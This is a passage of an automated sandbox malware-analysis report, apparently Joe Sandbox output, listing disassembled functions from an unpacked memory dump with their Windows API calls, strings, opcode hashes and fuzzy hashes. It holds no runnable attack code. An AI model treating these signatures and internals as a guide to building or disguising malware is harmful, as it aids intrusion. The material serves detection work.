                          • Instruction Fuzzy Hash: 4B11F971E00219EFDF00EFA5D485A9DBBB0FF04314F9084AEF814A7251DB389A159FA8
                          Function 00429C2A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00429C36
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __amsg_exit.LIBCMT ref: 00429C56
                          • __lock.LIBCMT ref: 00429C66
                          • InterlockedDecrement.KERNEL32(?), ref: 00429C83
                          • _free.LIBCMT ref: 00429C96
                          • InterlockedIncrement.KERNEL32(?), ref: 00429CAE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 3470314060-0
                          • Opcode ID: 36271023b223fadb9ab6e712b6c59eb3779a78d2d1be80bf2b56bb847cdc28d0
                          • Instruction ID: f4cbf64d02b6ba1de177e689c24b6bfbfdcea36b97806bb26546d54a50972fe8
                          • Opcode Fuzzy Hash: 36271023b223fadb9ab6e712b6c59eb3779a78d2d1be80bf2b56bb847cdc28d0
                          • Instruction Fuzzy Hash: 66018E31F40731DBDB25AB66A88579EB7B0AF44714F91401BE81867281DB3CAC82CBDD
                          Function 00414B70 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 230synchronizationCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414D63
                          • CloseHandle.KERNEL32(00000000), ref: 00414DA5
                          • CloseHandle.KERNEL32(00000000), ref: 00414E07
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00414E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleInfoLocale___crt$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 733634416-2564639436
                          • Opcode ID: f161013116c55da72c63ce6aca6e420a63ce0a8e746b5f21adae62202949ffd6
                          • Instruction ID: dcbe7d409504b365a2a01452fac66c244b140dda19594937d55e93dcf8af10d5
                          • Opcode Fuzzy Hash: f161013116c55da72c63ce6aca6e420a63ce0a8e746b5f21adae62202949ffd6
                          • Instruction Fuzzy Hash: BEA13C71E001189FFB24CF64C885FEAB775FB84308F1082A9E21DAB281D775AA95CF55
                          Function 00414F50 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 158COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                          • _memset.LIBCMT ref: 0041501B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt_memset
                          • String ID: $!$"$#
                          • API String ID: 2773535-1968938309
                          • Opcode ID: 879969bbcf9e88a68d182caabacd3840cb6aa25ddd5c16974c51c5bb072f6322
                          • Instruction ID: 2f7971235c982305489604d19ee49821e6440a5144027d68376bde22ab5174f8
                          • Opcode Fuzzy Hash: 879969bbcf9e88a68d182caabacd3840cb6aa25ddd5c16974c51c5bb072f6322
                          • Instruction Fuzzy Hash: E081F8B0904219DBEF24DF90D949BDEBBB5BB44308F1082E9D50C6B281D7BA5AC8CF55
                          Function 00416E10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00416EFC
                          • CloseHandle.KERNEL32(00000000), ref: 00416F32
                          • CloseHandle.KERNEL32(00000000), ref: 00416F82
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00416FEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeObjectSingleVirtualWait
                          • String ID: d
                          • API String ID: 129225811-2564639436
                          • Opcode ID: fcb17fb08f8a2ff92cdf329a4d91d832edf0e00a8f6b7ae9b3bbe9ed01b1c473
                          • Instruction ID: 28724bebe1558540128be9fac75f6438f6b6aced3d1ed3787778429b146f4564
                          • Opcode Fuzzy Hash: fcb17fb08f8a2ff92cdf329a4d91d832edf0e00a8f6b7ae9b3bbe9ed01b1c473
                          • Instruction Fuzzy Hash: 3A51C571A04508DBFF18DF94D688BEEBB76FB90309F114269D1166F280C739EA85CB45
                          Function 00402240 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00402304
                          • _memset.LIBCMT ref: 0040233B
                          • __snwprintf.LIBCMT ref: 004023C1
                            • Part of subcall function 00418A30: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • LocalFree.KERNEL32(00000000), ref: 0040246D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$FreeLocal__snwprintflstrlen
                          • String ID: D
                          • API String ID: 547233621-2746444292
                          • Opcode ID: 4634d576b41030485f2a96de2ad68d93fd5a6a344a01d45422100c6525b31f8c
                          • Instruction ID: 81c63f112d8dcbf07734da269fae86012bad78d6b23292d5f0bd21b72de31d1a
                          • Opcode Fuzzy Hash: 4634d576b41030485f2a96de2ad68d93fd5a6a344a01d45422100c6525b31f8c
                          • Instruction Fuzzy Hash: C2513BB1A012289FEB24DF50DD49BDAB778EB49304F0041EAE649A62C0D7B85BC4CF59
                          Function 0040FA70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrlen
                          • String ID: %s\%s$Software\%s
                          • API String ID: 2688013242-2632556899
                          • Opcode ID: 305207b4268d95a49d7e2fc9998977da54dd48712996234ef1c47d2f84a7d1c0
                          • Instruction ID: 69d85d81a122c71a471752251a4d3d692c880ee31a208757014cc80ab34610d5
                          • Opcode Fuzzy Hash: 305207b4268d95a49d7e2fc9998977da54dd48712996234ef1c47d2f84a7d1c0
                          • Instruction Fuzzy Hash: 4C513B74E082589BDB24DB60DC4ABA97274FF48700F5041FAA50DA6684DBBC6AC8CF59
                          Function 00414630 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004146EA
                          • CloseHandle.KERNEL32(00000000), ref: 00414707
                          • CloseHandle.KERNEL32(00000000), ref: 00414757
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ObjectSingleWait
                          • String ID: d
                          • API String ID: 2079671238-2564639436
                          • Opcode ID: a5f96bb87789628176a693ee8ee1716a4ddfd4f6497c231a73e9ba452fa58583
                          • Instruction ID: 7e9b78c2089fb5eeab0749f5871383a4faea996be51a3f975beff24ae6811640
                          • Opcode Fuzzy Hash: a5f96bb87789628176a693ee8ee1716a4ddfd4f6497c231a73e9ba452fa58583
                          • Instruction Fuzzy Hash: 0D518F31A04504DBFB18DF94CA88BADB776EBD030DF2442ADD1166F2D0C739AA95CB49
                          Function 0040C970 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$__snwprintf
                          • String ID: %s\%s\
                          • API String ID: 943882683-2168696002
                          • Opcode ID: 4eaf386347df97857c49bb7d8605883d18f9c58badc4eb0c2abeeb1f880bd2d7
                          • Instruction ID: e147fc819eea64ca5bfbedf496181ac7fb7691f2af72f04a92943b164336590f
                          • Opcode Fuzzy Hash: 4eaf386347df97857c49bb7d8605883d18f9c58badc4eb0c2abeeb1f880bd2d7
                          • Instruction Fuzzy Hash: F631CAB5A00209DFCB04DFA8D995AEEBBB5FF48304F148169EA09A7351D734A940CF99
                          Function 004081E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00408200
                          • _memset.LIBCMT ref: 0040821F
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snwprintf.LIBCMT ref: 00408266
                          • __snwprintf.LIBCMT ref: 0040828B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintflstrlen$_memset
                          • String ID: %s%s
                          • API String ID: 2330956672-3252725368
                          • Opcode ID: 865d7628b5a174b59cb6c7e6ff2d55de3777c8ac3998084ebc6a3df48adac488
                          • Instruction ID: b20160649954e81e419212330c58fef505bed6343514b354166d05e66b797ae1
                          • Opcode Fuzzy Hash: 865d7628b5a174b59cb6c7e6ff2d55de3777c8ac3998084ebc6a3df48adac488
                          • Instruction Fuzzy Hash: B321D971A4021897C750D7609C8DBEA7338AB54700F500AEEF619E21D1EBB99EC58F99
                          Function 004107D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf$lstrlen
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 3284962732-2868705786
                          • Opcode ID: 8b726a830be8a4895b1832ded17cdd1fbffd47a2450d479dd0b3ea99e2b69f56
                          • Instruction ID: 3e696753d65392d370302bbd45998c798e2be41506fe4e983add93e44d77990d
                          • Opcode Fuzzy Hash: 8b726a830be8a4895b1832ded17cdd1fbffd47a2450d479dd0b3ea99e2b69f56
                          • Instruction Fuzzy Hash: 2E215C74E00208FFDB14EFE0CD49BAE7775EF48700F6044A9E605A7290D7B89A84CB58
                          Function 00428AE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 00428AF5
                            • Part of subcall function 00428A50: ___BuildCatchObjectHelper.LIBCMT ref: 00428A86
                          • _UnwindNestedFrames.LIBCMT ref: 00428B0C
                          • ___FrameUnwindToState.LIBCMT ref: 00428B1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: csm$csm
                          • API String ID: 2163707966-3733052814
                          • Opcode ID: c644bb1f34e25dafeecb1de0a9cf138c67f1586482ca544ae8a6169931f09bde
                          • Instruction ID: 00180cedc8860145d2baff6723f8d8810d5bee4d271c32bfdd03eb9c5d3e9107
                          • Opcode Fuzzy Hash: c644bb1f34e25dafeecb1de0a9cf138c67f1586482ca544ae8a6169931f09bde
                          • Instruction Fuzzy Hash: 07018B71102129BBDF12AF41EC41EAF7F6AEF48348F40401ABD1810121DB3AA8B1DBA8
                          Function 0041D2C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0040108A), ref: 0041D2CB
                          • GetProcAddress.KERNEL32(0040108A,IsWow64Process), ref: 0041D2E4
                          • GetCurrentProcess.KERNEL32(00000000), ref: 0041D300
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCurrentHandleModuleProcProcess
                          • String ID: IsWow64Process$KERNEL32.DLL
                          • API String ID: 4190356694-1193389583
                          • Opcode ID: 6249933a974de57c9e72640388aaa2f8dcce2c95180c80794cf5e82f17424973
                          • Instruction ID: 1921a2b7e29602db8bc9adfb27e401dbea3e546df6c6ed425b6de87b01e167cf
                          • Opcode Fuzzy Hash: 6249933a974de57c9e72640388aaa2f8dcce2c95180c80794cf5e82f17424973
                          • Instruction Fuzzy Hash: 64F0A5B5D01208EFCB14EFE4D849BDDBFB8AB08301F209596A915A3240D778AA84DF59
                          Function 00406840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(USER32.DLL,?,?,00401085), ref: 0040684B
                          • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 00406863
                          • FreeLibrary.KERNEL32(00000000), ref: 0040687C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: SetProcessDPIAware$USER32.DLL
                          • API String ID: 145871493-772676101
                          • Opcode ID: 0e00f6680c7169ac265b0daa26ad8c3df0e65beedca7a244a355361eb86d0d96
                          • Instruction ID: d7e75f9fdd6377fbbd5236d9263629de4369e5fcd131ab1d584c9b0fff14c4d8
                          • Opcode Fuzzy Hash: 0e00f6680c7169ac265b0daa26ad8c3df0e65beedca7a244a355361eb86d0d96
                          • Instruction Fuzzy Hash: B2E03975E02308EFCB04EFE4D90C6CDBFB4AB48301F2190A6E906A3280D6786A40CB54
                          Function 00428488 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 004284A9
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 004284BA
                          • __getptd.LIBCMT ref: 004284C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$RCC
                          • API String ID: 803148776-2084237596
                          • Opcode ID: 93a7f3190e18b71f68f9d5de1e5f93c09d1e50684f76553ed21605a82b369ded
                          • Instruction ID: 7737c63d3136a0828a1331f2bbc2fa1bb380afa4dd28c4cacb1ee6c0cfc97e33
                          • Opcode Fuzzy Hash: 93a7f3190e18b71f68f9d5de1e5f93c09d1e50684f76553ed21605a82b369ded
                          • Instruction Fuzzy Hash: 00E01231715125DFD710BB69E44A76E3295BB84318F9904EBE80CC7323EB7CDC50996A
                          Function 004167E0 Relevance: 7.7, APIs: 5, Instructions: 169stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040CB60: lstrlenW.KERNEL32(?), ref: 0040CBC0
                          • _memmove.LIBCMT ref: 004168D6
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 004168E6
                          • lstrcpyW.KERNEL32(-00010000,00000000), ref: 004168F9
                          • lstrcpyW.KERNEL32(-00020000,00000000), ref: 0041690D
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004169F8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FreeVirtual_memmovelstrlen
                          • String ID:
                          • API String ID: 2365145790-0
                          • Opcode ID: 92839ab944face02cee3ff4d524ef7b910f60baafcd187accdf4e5d222d91e7c
                          • Instruction ID: 06fa96edf5e054ad43188d8be7ed40ae1f202543c7b99a146bbeaf362dd0ad67
                          • Opcode Fuzzy Hash: 92839ab944face02cee3ff4d524ef7b910f60baafcd187accdf4e5d222d91e7c
                          • Instruction Fuzzy Hash: 4E713DB5D00208DBDB04DFA4D889BEEBBB5FB48305F148529E50577280D7789984CF68
                          Function 00417DAB Relevance: 7.6, APIs: 5, Instructions: 85threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00417E07
                          • CloseHandle.KERNEL32(?), ref: 00417E39
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417E57
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417E8C
                          • ResumeThread.KERNEL32(00000000), ref: 00417ECC
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00417F39
                          • CloseHandle.KERNEL32(?), ref: 00417F71
                          • CloseHandle.KERNEL32(?), ref: 00417FA3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417FC1
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417FF5
                          • ResumeThread.KERNEL32(00000000), ref: 00418035
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID:
                          • API String ID: 738346648-0
                          • Opcode ID: 590f01a21b9718ac9ed64399f36247e05f455f45cc3c043a5bbdee1abbca3eb7
                          • Instruction ID: 2c11c2abda471f898dc428e74e83c8a7033fe9b91b3710d809d7093046dab45b
                          • Opcode Fuzzy Hash: 590f01a21b9718ac9ed64399f36247e05f455f45cc3c043a5bbdee1abbca3eb7
                          • Instruction Fuzzy Hash: ED416FB1A041059BDB48CF54C9C9FBEB7B2FB94304F15556EE21AAF2D1C730A891CB58
                          Function 0042F534 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _malloc.LIBCMT ref: 0042F542
                            • Part of subcall function 004256B9: __FF_MSGBANNER.LIBCMT ref: 004256D2
                            • Part of subcall function 004256B9: __NMSG_WRITE.LIBCMT ref: 004256D9
                            • Part of subcall function 004256B9: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00405B83,?), ref: 004256FE
                          • _free.LIBCMT ref: 0042F555
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap_free_malloc
                          • String ID:
                          • API String ID: 1020059152-0
                          • Opcode ID: 441664d7da4678698a6d9d0ed19a3842fb2feae85e2a5a83bfc4feba8890b744
                          • Instruction ID: d978e831b2cafcf954e5248f81c6a5c961bbb316b0d0cf1e3abffdfde8d45e15
                          • Opcode Fuzzy Hash: 441664d7da4678698a6d9d0ed19a3842fb2feae85e2a5a83bfc4feba8890b744
                          • Instruction Fuzzy Hash: 6C11B232701635BACB256F35BC0465E36A4AF807A4BE0443FF94996252DE3C9885869C
                          Function 0041CBCD Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: ece4f18416405fd832fad1abf87d3e54d1f91ce04ab1e08181c4e170daad7968
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: ece4f18416405fd832fad1abf87d3e54d1f91ce04ab1e08181c4e170daad7968
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CBEC Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: b686ff8bdfc05e106c20aa80165a9efd769ff4f8deaa7f8e744bc8b9cdd6501d
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: b686ff8bdfc05e106c20aa80165a9efd769ff4f8deaa7f8e744bc8b9cdd6501d
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC40 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: f74986d97ae5e8538954fb663ead6fb8cf86ad82d44154c6794cd10ba1680438
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: f74986d97ae5e8538954fb663ead6fb8cf86ad82d44154c6794cd10ba1680438
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC53 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 731f9bbc109e3ef206682bf242c89cf76e1722f8ae557b99efb38a03e99548d8
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 731f9bbc109e3ef206682bf242c89cf76e1722f8ae557b99efb38a03e99548d8
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC66 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: f713cfee621fd032cf6ea7a1be68935ccbbaf2e16e950218fcf80006d3a728d0
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: f713cfee621fd032cf6ea7a1be68935ccbbaf2e16e950218fcf80006d3a728d0
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC79 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 1fb1270d296bbd46eb1cc8022cfb665c3bbc0e02fc8c9adec0eea0844cc3e8fe
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 1fb1270d296bbd46eb1cc8022cfb665c3bbc0e02fc8c9adec0eea0844cc3e8fe
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CCC5 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 9da45043f5abe3937aea9bc193c07396d5de998bdd8a888cc472dc2aac9b643f
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
                          • Opcode Fuzzy Hash: 9da45043f5abe3937aea9bc193c07396d5de998bdd8a888cc472dc2aac9b643f
                          • Instruction Fuzzy Hash: A8210871554200DBD718AFA4ED9CB9A3776EB55306F10453AF219622F0CB7898CACB1D
                          Function 0041CC8C Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitFreeLocalProcess
                          • String ID:
                          • API String ID: 2341366623-0
                          • Opcode ID: 59b72818c02ad9c66f209a0dfa9ef427c6eaac385237f59953ff017e171112e7
                          • Instruction ID: aaf2cc8c7df5709d2270552724e820aaec17009ff33ccf02a5cd1cc3e68c1f22
